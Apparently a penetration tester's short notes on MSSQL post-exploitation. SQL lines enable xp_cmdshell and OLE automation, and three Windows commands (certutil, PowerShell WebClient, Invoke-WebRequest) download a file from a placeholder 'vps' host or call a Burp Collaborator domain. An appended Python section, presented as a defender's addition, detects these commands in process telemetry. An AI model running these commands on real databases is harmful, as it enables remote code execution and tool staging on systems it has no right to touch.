notes

App download

https://apps.evozi.com/

mssql

  • Enable xp_cmdshell
    -- Enable
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'xp_cmdshell',1;RECONFIGURE;
    -- Disable
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'xp_cmdshell',0;RECONFIGURE;
  • Enable sp_oacreate
    EXEC sp_configure 'show advanced options',1;RECONFIGURE WITH OVERRIDE;
    EXEC sp_configure 'Ole Automation Procedures',1;RECONFIGURE WITH OVERRIDE;

    Reverse shell

Outbound connectivity

powershell Invoke-WebRequest -Uri http://8hqusgclehwflidvrby79sgm4da3ys.burpcollaborator.net
certutil.exe -urlcache -split -f http://vps/a.txt D:\a.txt
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://vps/a.txt', 'D:\a.txt')"
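
A defender's view of the commands above, as an added example that is not part of the original notes: a command run through xp_cmdshell executes as a child of the SQL Server process, so process-creation telemetry can flag these download and callback commands and raise severity when the parent is sqlservr.exe. The sample events, rule names and example.test hosts are constructed for illustration.

```python
import re

# Constructed process-creation events: (parent image, child command line). Not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     r"cmd.exe /c certutil.exe -urlcache -split -f http://files.example.test/a.txt D:\a.txt"),
    (r"C:\Windows\explorer.exe",
     r'''powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://files.example.test/a.txt', 'D:\a.txt')"'''),
    (r"C:\Windows\System32\cmd.exe",
     r"powershell Invoke-WebRequest -Uri http://probe.example.test"),
    (r"C:\Windows\System32\cmd.exe",
     r"certutil.exe -hashfile D:\a.txt SHA256"),  # benign use, must not match
]

# One rule per command form listed in the notes above.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)),
    ("powershell_webclient_download",
     re.compile(r"\bpowershell(\.exe)?\b.*\bNet\.WebClient\b.*\bDownloadFile\b", re.I)),
    ("powershell_invoke_webrequest",
     re.compile(r"\bpowershell(\.exe)?\b.*\bInvoke-WebRequest\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def classify(parent_image, command_line):
    """Return a finding dict if the command line matches a rule, else None."""
    for name, pattern in RULES:
        if pattern.search(command_line):
            # A database engine spawning a downloader is far rarer than a user doing so.
            from_sql = parent_image.lower().endswith("\\sqlservr.exe")
            url = URL_RE.search(command_line)
            return {"rule": name,
                    "severity": "high" if from_sql else "medium",
                    "url": url.group(0) if url else None}
    return None


def scan(events):
    """Classify every event and keep only the findings."""
    return [f for f in (classify(p, c) for p, c in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```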